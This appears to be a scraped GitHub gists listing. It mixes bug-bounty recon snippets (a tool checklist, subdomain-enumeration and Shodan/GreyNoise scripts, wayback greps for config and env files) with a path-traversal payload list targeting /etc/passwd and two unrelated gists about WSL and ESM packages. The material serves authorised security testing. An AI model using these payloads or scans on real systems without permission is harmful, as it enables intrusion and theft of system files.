Diaa Hassan Diaa-Hassan

❌❌ :RECON CHECKLIST:❌❌
1. Subdomain Enumeration: subfinder-amass-altdns-sublister-assetfinder-findomain
2. Resolving Subdomains: HTTPX/HTTPROBE
3. Screenshotting: HTTPX/AQUATONE/EYEWITNESS/GOWITNESS
4. Port Scan: Nmap/Zenmap/Aquatone/Amass
5. Directory Bruteforce: FFUF/Dirsearch/Dirbuster
6. Crawling: waybackurls/gau
7. Finding endpoints from JS: relative-url-extractor
8. Manual Recon: Burp Suite
@MathiasBaumgartinger
MathiasBaumgartinger / open.py
Last active September 8, 2022 05:28
WSL python script for easy opening of files and directories
#!/usr/bin/env python3
"""
Add this script to a global directory (e.g. /usr/local/bin) in your WSL
without the ``.py`` extension.
This script will automatically open any file/directory with its default
Windows Application. Directories will be opened with Windows' file
explorer.
Usage: open <(dir/file)>
@nullenc0de
nullenc0de / breach.sh
Created January 27, 2021 15:06
Script will look up company assets and search them on greynoise.
cat cust.txt |assetfinder -subs-only | filter-resolved -c 100 | while read resolved; do host -t A "$resolved" | awk '{print $NF}' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'; done |sort -u |while read ip; do greynoise quick $ip ; done |grep -v "NOT" |cut -d ' ' -f1 |greynoise ip |sed -e '/malicious/,/rDNS/!d'
#!/usr/bin/env bash
echo "Enter name of the program: "
read PROGNAME
echo "enter name of the seed domain for amass "
read SEED
BOUNTYD=$HOME/01/bounty
PLATFORM=h1
# create project directory
# ascr auto screenshot ,mscr manual screenshot
#!/bin/sh
echo $1 | waybackurls > wayback-results
cat wayback-results | grep "\.conf" | tee $1-poorGF
cat wayback-results | grep "\.xml" | tee -a $1-poorGF
cat wayback-results | grep "\.db" | tee -a $1-poorGF
cat wayback-results | grep "\.log" | tee -a $1-poorGF
cat wayback-results | grep "config" | tee -a $1-poorGF
cat wayback-results | grep "env" | tee -a $1-poorGF
#!/bin/sh
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee bugcrowd-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'| grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee federacy-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee h1-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee intigriti-wildcards
@chr0ll0x0
chr0ll0x0 / auto-subdomains.sh
Last active July 8, 2022 21:57
for subdomains
#!/bin/bash
#please install this tool first
#install jq
#Assetfinder - https://github.com/tomnomnom/assetfinder
#Subfinder - https://github.com/projectdiscovery/subfinder
#Amass - https://github.com/OWASP/Amass
#Findomain https://github.com/Findomain/Findomain
#Anew https://github.com/tomnomnom/anew
#crobat https://github.com/cgboal/sonarsearch/crobat
@0x240x23elu
0x240x23elu / traversals-8-deep-exotic-encoding.txt
Created February 23, 2021 05:20
traversals-8-deep-exotic-encoding.txt
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/..%2fetc/passwd
/..%2f..%2fetc/passwd
@sindresorhus
sindresorhus / esm-package.md
Last active October 31, 2025 00:11
Pure ESM package


The package that linked you here is now pure ESM. It cannot be require()'d from CommonJS.

This means you have the following choices:

  1. Use ESM yourself. (preferred)
    Use import foo from 'foo' instead of const foo = require('foo') to import the package. You also need to put "type": "module" in your package.json and more. Follow the below guide.
  2. If the package is used in an async context, you could use await import(…) from CommonJS instead of require(…).
  3. Stay on the existing version of the package until you can move to ESM.
@Zeyad-Azima
Zeyad-Azima / shodrecon.py
Created May 2, 2021 22:46
A simple shodan recon script for bug bounty
#By: Zeyad Azima (https://github.com/Zeyad-Azima)
# install:
## pip3 install requests
## pip3 install shodan
# Run: python3 shodrecon.py target
import shodan, requests, json, threading, sys
# Your Api key here
API_KEY = ""